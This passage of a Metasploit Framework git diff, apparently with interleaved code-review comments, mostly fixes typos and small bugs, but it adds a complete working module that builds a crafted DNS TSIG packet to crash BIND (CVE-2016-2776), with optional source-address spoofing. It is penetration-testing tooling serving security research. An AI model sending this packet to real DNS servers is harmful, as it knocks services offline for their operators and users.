+ case key + when "user-agent" + agent = to_regex(value) + when "allow" + @allows[agent] ||= [] + @allows[agent] << to_regex(value) + when "disallow" + @disallows[agent] ||= [] + @disallows[agent] << to_regex(value) + when "crawl-delay" + @delays[agent] = value.to_i + else + @other[key] ||= [] + @other[key] << value + end + end + + @parsed = true + end + + def allowed?(uri, user_agent) + return true unless @parsed + allowed = true + path = uri.request_uri + + @disallows.each do |key, value| + if user_agent =~ key + value.each do |rule| + allowed = false if path =~ rule + end + end + end + + @allows.each do |key, value| + unless allowed + if user_agent =~ key + value.each do |rule| + if path =~ rule + allowed = true + end + end + end + end + end + + if allowed && @delays[user_agent] + sleep @delays[user_agent] - (Time.now - @last_accessed) + @last_accessed = Time.now + end + + return allowed + end + + def other_values + @other + end + + protected + + def to_regex(pattern) + return /should-not-match-anything-123456789/ if pattern.strip.empty? 
+ pattern = Regexp.escape(pattern) + pattern.gsub!(Regexp.escape("*"), ".*") + Regexp.compile("^#{pattern}") + end + end + + def self.get_robots_txt(uri, user_agent) + begin + Timeout.timeout(Robots.timeout) do + begin + URI.join(uri.to_s, "/robots.txt").open("User-Agent" => user_agent) + rescue StandardError + nil + end + end + rescue Timeout::Error + dlog("robots.txt request timed out") + end + end + + attr_writer :timeout + + def self.timeout + @timeout || DEFAULT_TIMEOUT + end + + def initialize(user_agent) + @user_agent = user_agent + @parsed = {} + end + + def allowed?(uri) + uri = URI.parse(uri.to_s) unless uri.is_a?(URI) + host = uri.host + @parsed[host] ||= ParsedRobots.new(uri, @user_agent) + @parsed[host].allowed?(uri, @user_agent) + end + + def other_values(uri) + uri = URI.parse(uri.to_s) unless uri.is_a?(URI) + host = uri.host + @parsed[host] ||= ParsedRobots.new(uri, @user_agent) + @parsed[host].other_values + end +end diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 8cd1c63084..1449af4a8c 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,9 +70,9 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.1' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.9' # Needed for the next-generation POSIX Meterpreter - spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.0' + spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.2' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. 
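Review bot: In `ParsedRobots#allowed?` the crawl-delay is never applied: `@delays` is keyed by the Regexp produced by `to_regex` (`@delays[agent] = value.to_i`), but the lookup uses the raw `user_agent` string, so `@delays[user_agent]` is always nil. Had it matched, `sleep @delays[user_agent] - (Time.now - @last_accessed)` would raise ArgumentError on the first call, because `@last_accessed` starts at `Time.at(1)` and `sleep` rejects a negative interval; match the agent against the regex keys and clamp the wait as below. Separately, `attr_writer :timeout` defines an instance-level `Robots#timeout=` while `self.timeout` reads the class-level `@timeout`, so `Robots.timeout = n` would raise NoMethodError and the instance writer sets a value nothing reads; move it to `class << self; attr_writer :timeout; end`. The `rescue StandardError; nil` in `get_robots_txt` also hides every fetch failure, which is presumably intentional as a fail-open default but deserves a `dlog` like the timeout branch has.
```ruby
      # … unchanged: @disallows / @allows evaluation …
      _agent, delay = @delays.find { |agent, _| user_agent =~ agent }
      if allowed && delay
        wait = delay - (Time.now - @last_accessed)
        sleep(wait) if wait > 0
        @last_accessed = Time.now
      end

      return allowed
```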
@@ -171,8 +171,6 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'rex-exploitation' # Command line editing, history, and tab completion in msfconsole spec.add_runtime_dependency 'rb-readline' - # Needed by anemone crawler - spec.add_runtime_dependency 'robots' # Needed by some modules spec.add_runtime_dependency 'rubyzip' # Needed for some post modules diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 2abb00bcfa..800a2d9088 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This modules exploits a remote registry access flaw in the BackupExec Windows Server RPC service. This vulnerability was discovered by Pedram Amini and is based - on the NDR stub information information posted to openrce.org. + on the NDR stub information posted to openrce.org. Please see the action list for the different attack modes. }, diff --git a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb index 63149a522d..d387f35353 100644 --- a/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dir_645_password_extractor.rb @@ -49,7 +49,6 @@ class MetasploitModule < Msf::Auxiliary }.merge(service_data) login_data = { - last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED, proof: opts[:proof] diff --git a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb index ad2a504121..9cbfa6c1bb 100644 --- a/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb +++ b/modules/auxiliary/admin/http/dlink_dsl320b_password_extractor.rb 
@@ -46,7 +46,6 @@ class MetasploitModule < Msf::Auxiliary }.merge(service_data) login_data = { - last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED, proof: opts[:proof] diff --git a/modules/auxiliary/admin/http/intersil_pass_reset.rb b/modules/auxiliary/admin/http/intersil_pass_reset.rb index 8d5ed21909..7d4061afe6 100644 --- a/modules/auxiliary/admin/http/intersil_pass_reset.rb +++ b/modules/auxiliary/admin/http/intersil_pass_reset.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Intersil (Boa) HTTPd Basic Authentication Password Reset', 'Description' => %q{ - The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11 + The Intersil extension in the Boa HTTP Server 0.93.x - 0.94.11 allows basic authentication bypass when the user string is greater than 127 bytes long. The long string causes the password to be overwritten in memory, which enables the attacker to reset the diff --git a/modules/auxiliary/admin/http/netgear_auth_download.rb b/modules/auxiliary/admin/http/netgear_auth_download.rb index 385693beac..304904203f 100644 --- a/modules/auxiliary/admin/http/netgear_auth_download.rb +++ b/modules/auxiliary/admin/http/netgear_auth_download.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. The application has a file download vulnerability that can be exploited by an - authenticated remote attacker to download any file in the system.. + authenticated remote attacker to download any file in the system. This module has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13. }, 'Author' => diff --git a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb index e2a67a4547..f8f388ef84 100644 --- a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb 
+++ b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb @@ -61,7 +61,6 @@ class MetasploitModule < Msf::Auxiliary }.merge(service_data) login_data = { - last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::UNTRIED }.merge(service_data) diff --git a/modules/auxiliary/admin/http/openbravo_xxe.rb b/modules/auxiliary/admin/http/openbravo_xxe.rb index 5358daea5e..5f5684c270 100644 --- a/modules/auxiliary/admin/http/openbravo_xxe.rb +++ b/modules/auxiliary/admin/http/openbravo_xxe.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Auxiliary local files. This allows the user to read any files from the FS as the user Openbravo is running as (generally not root). - This module was tested againt Openbravo ERP version 3.0MP25 and 2.50MP6. + This module was tested against Openbravo ERP version 3.0MP25 and 2.50MP6. }, 'Author' => [ diff --git a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb index 388aa2a249..98f66d9436 100644 --- a/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb +++ b/modules/auxiliary/admin/http/tomcat_utf8_traversal.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary super( 'Name' => 'Tomcat UTF-8 Directory Traversal Vulnerability', 'Description' => %q{ - This module tests whether a directory traversal vulnerablity is present + This module tests whether a directory traversal vulnerability is present in versions of Apache Tomcat 4.1.0 - 4.1.37, 5.5.0 - 5.5.26 and 6.0.0 - 6.0.16 under specific and non-default installations. The connector must have allowLinking set to true and URIEncoding set to UTF-8. Furthermore, the diff --git a/modules/auxiliary/admin/http/webnms_cred_disclosure.rb b/modules/auxiliary/admin/http/webnms_cred_disclosure.rb index 2859b8a9e5..aac40a960f 100644 --- a/modules/auxiliary/admin/http/webnms_cred_disclosure.rb +++ b/modules/auxiliary/admin/http/webnms_cred_disclosure.rb 
@@ -14,9 +14,9 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'WebNMS Framework Server Credential Disclosure', 'Description' => %q( This module abuses two vulnerabilities in WebNMS Framework Server 5.2 to extract -all user credentials. The first vulnerability is a unauthenticated file download +all user credentials. The first vulnerability is an unauthenticated file download in the FetchFile servlet, which is used to download the file containing the user -credentials. The second vulnerability is that the the passwords in the file are +credentials. The second vulnerability is that the passwords in the file are obfuscated with a very weak algorithm which can be easily reversed. This module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on Windows and Linux. diff --git a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb index 677dbddd4d..f5086898fe 100644 --- a/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb +++ b/modules/auxiliary/admin/http/wp_easycart_privilege_escalation.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'WordPress WP EasyCart Plugin Privilege Escalation', 'Description' => %q{ The WordPress WP EasyCart plugin from version 1.1.30 to 3.0.20 allows authenticated - users of any user level to set any system option via a lack of validation in the + users of any user level to set any system option via a lack of validation in the ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in /inc/admin/admin_ajax_functions.php. The module first changes the admin e-mail address to prevent any notifications being sent to the actual administrator during the attack, diff --git a/modules/auxiliary/admin/mssql/mssql_sql.rb b/modules/auxiliary/admin/mssql/mssql_sql.rb index 800df01a10..5102aa6f28 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql.rb 
@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Microsoft SQL Server Generic Query', 'Description' => %q{ This module will allow for simple SQL statements to be executed against a - MSSQL/MSDE instance given the appropiate credentials. + MSSQL/MSDE instance given the appropriate credentials. }, 'Author' => [ 'tebo ' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/admin/mssql/mssql_sql_file.rb b/modules/auxiliary/admin/mssql/mssql_sql_file.rb index 1f7e70c901..13b5d4ee90 100644 --- a/modules/auxiliary/admin/mssql/mssql_sql_file.rb +++ b/modules/auxiliary/admin/mssql/mssql_sql_file.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module will allow for multiple SQL queries contained within a specified file to be executed against a Microsoft SQL (MSSQL) Server instance, given - the appropiate credentials. + the appropriate credentials. }, 'Author' => [ 'j0hn__f : ' ], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/admin/oracle/oracle_sql.rb b/modules/auxiliary/admin/oracle/oracle_sql.rb index 63f59dd4ff..ccc52fad7f 100644 --- a/modules/auxiliary/admin/oracle/oracle_sql.rb +++ b/modules/auxiliary/admin/oracle/oracle_sql.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Oracle SQL Generic Query', 'Description' => %q{ This module allows for simple SQL statements to be executed - against a Oracle instance given the appropriate credentials + against an Oracle instance given the appropriate credentials and sid. }, 'Author' => [ 'MC' ], diff --git a/modules/auxiliary/admin/oracle/osb_execqr.rb b/modules/auxiliary/admin/oracle/osb_execqr.rb index 78f0b5493d..ad79ecd3f1 100644 --- a/modules/auxiliary/admin/oracle/osb_execqr.rb +++ b/modules/auxiliary/admin/oracle/osb_execqr.rb 
@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Oracle Secure Backup exec_qr() Command Injection Vulnerability', 'Description' => %q{ - This module exploits a command injection vulnerablility in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2. + This module exploits a command injection vulnerability in Oracle Secure Backup version 10.1.0.3 to 10.2.0.2. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/admin/postgres/postgres_sql.rb b/modules/auxiliary/admin/postgres/postgres_sql.rb index f9f4a8753e..6f2a440c7b 100644 --- a/modules/auxiliary/admin/postgres/postgres_sql.rb +++ b/modules/auxiliary/admin/postgres/postgres_sql.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'PostgreSQL Server Generic Query', 'Description' => %q{ This module will allow for simple SQL statements to be executed against a - PostgreSQL instance given the appropiate credentials. + PostgreSQL instance given the appropriate credentials. }, 'Author' => [ 'todb' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/admin/scada/multi_cip_command.rb b/modules/auxiliary/admin/scada/multi_cip_command.rb index a59d251059..9aa11c2593 100644 --- a/modules/auxiliary/admin/scada/multi_cip_command.rb +++ b/modules/auxiliary/admin/scada/multi_cip_command.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Allen-Bradley/Rockwell Automation EtherNet/IP CIP Commands', 'Description' => %q{ - The EtnerNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which + The EtherNet/IP CIP protocol allows a number of unauthenticated commands to a PLC which implements the protocol. This module implements the CPU STOP command, as well as the ability to crash the Ethernet card in an affected device. diff --git a/modules/auxiliary/admin/tikiwiki/tikidblib.rb b/modules/auxiliary/admin/tikiwiki/tikidblib.rb index 09c487e805..00ed3382fc 100644 
--- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb +++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'TikiWiki Information Disclosure', 'Description' => %q{ A vulnerability has been reported in Tikiwiki, which can be exploited by - a anonymous user to dump the MySQL user & passwd just by creating a mysql + an anonymous user to dump the MySQL user & passwd just by creating a mysql error with the "sort_mode" var. The vulnerability was reported in Tikiwiki version 1.9.5. diff --git a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb index 34da3baa0b..8f2d92e211 100644 --- a/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb +++ b/modules/auxiliary/admin/webmin/edit_html_fileaccess.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Auxiliary This module exploits a directory traversal in Webmin 1.580. The vulnerability exists in the edit_html.cgi component and allows an authenticated user with access to the File Manager Module to access arbitrary files with root privileges. The - module has been tested successfully with Webim 1.580 over Ubuntu 10.04. + module has been tested successfully with Webmin 1.580 over Ubuntu 10.04. }, 'Author' => [ 'Unknown', # From American Information Security Group diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index 2ec80ec70d..c86816b9b5 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'BNAT Scanner', 'Description' => %q{ This module is a scanner which can detect Broken NAT (network address translation) - implementations, which could result in a inability to reach ports on remote + implementations, which could result in an inability to reach ports on remote machines. Typically, these ports will appear in nmap scans as 'filtered'/'closed'. }, 'Author' => 
diff --git a/modules/auxiliary/client/hwbridge/connect.rb b/modules/auxiliary/client/hwbridge/connect.rb index def36bda71..79ed4e7259 100644 --- a/modules/auxiliary/client/hwbridge/connect.rb +++ b/modules/auxiliary/client/hwbridge/connect.rb @@ -18,10 +18,10 @@ class MetasploitModule < Msf::Auxiliary Metasploit to interact with Hardware Devices. This extends the normal exploit capabilities to the non-ethernet realm and enables direct hardware and alternative bus manipulations. You - mush have compatible bridging hardware attached to this machine or + must have compatible bridging hardware attached to this machine or reachable on your network to use any HWBridge exploits. - Use this exploit module to connect the the physical HWBridge which + Use this exploit module to connect the physical HWBridge which will start an interactive hwbridge session. You can launch a hwbridge server locally by using compliant hardware and executing the local_hwbridge module. After that module has started, pass the HWBRIDGE_BASE_URL @@ -104,6 +104,10 @@ class MetasploitModule < Msf::Auxiliary if self.hw_specialty.has_key? 'rftransceiver' sess.load_rftransceiver if self.hw_specialty['rftransceiver'] == true end + sess.api_version = self.api_version if self.api_version + sess.fw_version = self.fw_version if self.fw_version + sess.hw_version = self.hw_version if self.hw_version + sess.device_name = self.device_name if self.device_name end # @@ -129,6 +133,18 @@ class MetasploitModule < Msf::Auxiliary if data.key? 'hw_capabilities' self.hw_capabilities = data['hw_capabilities'] end + if data.key? 'api_version' + self.api_version = data['api_version'] + end + if data.key? 'fw_version' + self.fw_version = data['fw_version'] + end + if data.key? 'hw_vesrion' + self.hw_version = data['hw_version'] + end + if data.key? 'device_name' + self.device_name = data['device_name'] + end end end end 
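Review bot: In the `@@ -129,6 +133,18 @@` hunk the key check is misspelled, `if data.key? 'hw_vesrion'`, so `self.hw_version` is never assigned even though the body reads `data['hw_version']`; it should be `if data.key? 'hw_version'`. The four identical `if data.key? … self.x = data['x']` blocks could be collapsed into a small loop over the attribute names, which would have made the typo impossible. The enclosing method starts outside the hunk, so where `data` comes from cannot be confirmed here; it appears to be the remote bridge's response, so these values should be treated as untrusted strings wherever they are later displayed.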
@@ -153,9 +169,17 @@ class MetasploitModule < Msf::Auxiliary attr_reader :hw_specialty attr_reader :hw_capabilities + attr_reader :api_version + attr_reader :fw_version + attr_reader :hw_version + attr_reader :device_name protected attr_writer :hw_specialty attr_writer :hw_capabilities + attr_writer :api_version + attr_writer :fw_version + attr_writer :hw_version + attr_writer :device_name end diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index 608486e697..13df8e2a12 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary def initialize(info = {}) super(update_info(info, 'Name' => 'Metasploit Web Crawler', - 'Description' => 'This auxiliary module is a modular web crawler, to be used in conjuntion with wmap (someday) or standalone.', + 'Description' => 'This auxiliary module is a modular web crawler, to be used in conjunction with wmap (someday) or standalone.', 'Author' => 'et', 'License' => MSF_LICENSE )) diff --git a/modules/auxiliary/dos/dns/bind_tsig.rb b/modules/auxiliary/dos/dns/bind_tsig.rb new file mode 100644 index 0000000000..b88cb02cb6 --- /dev/null +++ b/modules/auxiliary/dos/dns/bind_tsig.rb 
@@ -0,0 +1,99 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Capture + include Msf::Auxiliary::UDPScanner + include Msf::Auxiliary::Dos + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'BIND TKEY Query Denial of Service', + 'Description' => %q{ + A defect in the rendering of messages into packets can cause named to + exit with an assertion failure in buffer.c while constructing a response + to a query that meets certain criteria. + + This assertion can be triggered even if the apparent source address + isn't allowed to make queries. + }, + # Research and Original PoC - msf module author + 'Author' => [ + 'Martin Rocha', + 'Ezequiel Tavella', + 'Alejandro Parodi', + 'Infobyte Research Team' + ], + 'References' => [ + ['CVE', '2016-2776'], + ['URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html'] + ], + 'DisclosureDate' => 'Sep 27 2016', + 'License' => MSF_LICENSE, + 'DefaultOptions' => {'ScannerRecvWindow' => 0} + )) + + register_options([ + Opt::RPORT(53), + OptAddress.new('SRC_ADDR', [false, 'Source address to spoof']) + ]) + + deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT') + end + + def scan_host(ip) + if datastore['SRC_ADDR'] + scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR']) + else + print_status("Sending packet to #{ip}") + scanner_send(payload, ip, rport) + end + end + + def payload + query = Rex::Text.rand_text_alphanumeric(2) # Transaction ID: 0x8f65 + query << "\x00\x00" # Flags: 0x0000 Standard query + query << "\x00\x01" # Questions: 1 + query << "\x00\x00" # Answer RRs: 0 + query << "\x00\x00" # Authority RRs: 0 + query << "\x00\x01" # Additional RRs: 1 + + # Doman Name + query << get_domain # Random DNS Name + query << "\x00" # [End of name] + query << "\x00\x01" # Type: A (Host Address) (1) + query << "\x00\x01" 
# Class: IN (0x0001) + + # Aditional records. Name + query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes + query << "\x3d"+Rex::Text.rand_text_alphanumeric(61) + query << "\x00" + + query << "\x00\xfa" # Type: TSIG (Transaction Signature) (250) + query << "\x00\xff" # Class: ANY (0x00ff) + query << "\x00\x00\x00\x00" # Time to live: 0 + query << "\x00\xfc" # Data length: 252 + + # Algorithm Name + query << ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes + query << "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes + query << "\x00" + + # Rest of TSIG + query << "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan 1, 1970 03:15:07.000000000 ART + query << "\x01\x2c" # Fudge: 300 + query << "\x00\x10" # MAC Size: 16 + query << Rex::Text.rand_text_alphanumeric(16) # MAC + query << "\x8f\x65" # Original Id: 36709 + query << "\x00\x00" # Error: No error (0) + query << "\x00\x00" # Other len: 0 + end + + def get_domain + domain = "\x06"+Rex::Text.rand_text_alphanumeric(6) + org = "\x03"+Rex::Text.rand_text_alphanumeric(3) + domain+org + end +end diff --git a/modules/auxiliary/dos/misc/dopewars.rb b/modules/auxiliary/dos/misc/dopewars.rb index 9929e50f72..3369dc1cbc 100644 --- a/modules/auxiliary/dos/misc/dopewars.rb +++ b/modules/auxiliary/dos/misc/dopewars.rb @@ -11,8 +11,8 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'Dopewars Denial of Service', 'Description' => %q{ - The jet command in Dopewars 1.5.12 is vulnerable to a segmentaion fault due to - a lack of input validation. + The jet command in Dopewars 1.5.12 is vulnerable to a segmentation fault due to + a lack of input validation. }, 'Author' => [ 'Doug Prostko ' ], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb index 2ee3e29a30..dad888e518 100644 --- a/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb 
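Review bot: The inline comments in `payload` describe a captured packet rather than the one the code builds: `# Transaction ID: 0x8f65`, `# Time Signed: Jan 1, 1970 …` and `# MAC` all annotate fields that are filled with `Rex::Text.rand_text_alphanumeric`, and `"\x8f\x65" # Original Id: 36709` no longer corresponds to the randomized transaction id two dozen lines above. Rewording them as `# Transaction ID: random` (and similarly for the other randomized fields) would stop a reader from trusting values the code does not produce; the comment typos `Doman Name` and `Aditional records` can be fixed at the same time. Also, `scan_host` only prints `Sending packet to #{ip}` on the non-spoofed branch, so runs with `SRC_ADDR` set produce no per-host output.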
+++ b/modules/auxiliary/dos/ssl/dtls_changecipherspec.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'OpenSSL DTLS ChangeCipherSpec Remote DoS', 'Description' => %q{ This module performs a Denial of Service Attack against Datagram TLS in OpenSSL - version 0.9.8i and earlier. OpenSSL crashes under these versions when it recieves a + version 0.9.8i and earlier. OpenSSL crashes under these versions when it receives a ChangeCipherspec Datagram before a ClientHello. }, 'Author' => [ diff --git a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb index d54aea9ebb..541f1f4e0b 100644 --- a/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb +++ b/modules/auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Auxiliary FTP request containing Telnet IAC (0xff) bytes. When constructing the response, the Microsoft IIS FTP Service overflows the heap buffer with 0xff bytes. - This issue can be triggered pre-auth and may in fact be explotiable for + This issue can be triggered pre-auth and may in fact be exploitable for remote code execution. }, 'Author' => diff --git a/modules/auxiliary/dos/windows/games/kaillera.rb b/modules/auxiliary/dos/windows/games/kaillera.rb index 5c0eb9a1a5..e9f9bd4c8d 100644 --- a/modules/auxiliary/dos/windows/games/kaillera.rb +++ b/modules/auxiliary/dos/windows/games/kaillera.rb @@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary 'Name' => 'Kaillera 0.86 Server Denial of Service' , 'Description' => %q{ The Kaillera 0.86 server can be shut down by sending any malformed packet - after the intial "hello" packet. + after the initial "hello" packet. }, 'Author' => ["Sil3nt_Dre4m"], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb index 5cbb78f465..71c44a4f2a 100644 
--- a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Auxiliary 'Description' => %q{ This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger - this bug, run this module as a service and forces a vulnerabile client + this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB server. This can be accomplished by embedding a UNC path (\\HOST\share\something) into a web page if the target is using Internet Explorer, or a Word document otherwise. diff --git a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb index 8a4d8c337a..b9bf75753f 100644 --- a/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb +++ b/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb @@ -98,7 +98,7 @@ class MetasploitModule < Msf::Auxiliary @versions.each do |version| print_status("#{host}:#{rport} fuzzing version #{version} control messages (mode 6)") @mode_6_operations.each do |op| - request = Rex::Proto::NTP.ntp_control(version, op) + request = Rex::Proto::NTP.ntp_control(version, op).to_binary_s what = "#{request.size}-byte version #{version} mode 6 op #{op} message" vprint_status("#{host}:#{rport} probing with #{request.size}-byte #{what}") responses = probe(host, datastore['RPORT'].to_i, request) 
@@ -114,7 +114,7 @@ class MetasploitModule < Msf::Auxiliary print_status("#{host}:#{rport} fuzzing version #{version} private messages (mode 7)") @mode_7_implementations.each do |implementation| @mode_7_request_codes.each do |request_code| - request = Rex::Proto::NTP.ntp_private(version, implementation, request_code, "\0" * 188) + request = Rex::Proto::NTP.ntp_private(version, implementation, request_code, "\0" * 188).to_binary_s what = "#{request.size}-byte version #{version} mode 7 imp #{implementation} req #{request_code} message" vprint_status("#{host}:#{rport} probing with #{request.size}-byte #{what}") responses = probe(host, datastore['RPORT'].to_i, request) @@ -164,6 +164,7 @@ class MetasploitModule < Msf::Auxiliary # TODO: is there a better way to pick this size? Should more than one be tried? request.payload = SecureRandom.random_bytes(16) end + request = request.to_binary_s what = "#{request.size}-byte #{short ? 'short ' : nil}version #{version} mode #{mode} message" vprint_status("#{host}:#{rport} probing with #{what}") responses = probe(host, datastore['RPORT'].to_i, request) diff --git a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb index 4e8ef78ad7..3e4be7c9b5 100644 --- a/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb +++ b/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'SMB Negotiate SMB2 Dialect Corruption', 'Description' => %q{ - This module sends a series of SMB negiotiate requests that advertise a + This module sends a series of SMB negotiate requests that advertise a SMB2 dialect with corrupted bytes. }, 'Author' => [ 'hdm' ], diff --git a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb index d5c4007219..94d8691e10 100644 --- a/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb 
+++ b/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb @@ -11,7 +11,7 @@ class MetasploitModule < Msf::Auxiliary super(update_info(info, 'Name' => 'SMB Negotiate Dialect Corruption', 'Description' => %q{ - This module sends a series of SMB negiotiate requests with corrupted bytes + This module sends a series of SMB negotiate requests with corrupted bytes }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE diff --git a/modules/auxiliary/gather/android_stock_browser_uxss.rb b/modules/auxiliary/gather/android_stock_browser_uxss.rb index 51b9f935de..9bc23a0ac5 100644 --- a/modules/auxiliary/gather/android_stock_browser_uxss.rb +++ b/modules/auxiliary/gather/android_stock_browser_uxss.rb @@ -20,8 +20,8 @@ class MetasploitModule < Msf::Auxiliary which will cause a popup window to be used. This requires a click from the user and is much less stealthy, but is generally harmless-looking. - By supplying a CUSTOM_JS paramter and ensuring CLOSE_POPUP is set to false, this - module also allows running aribrary javascript in the context of the targeted URL. + By supplying a 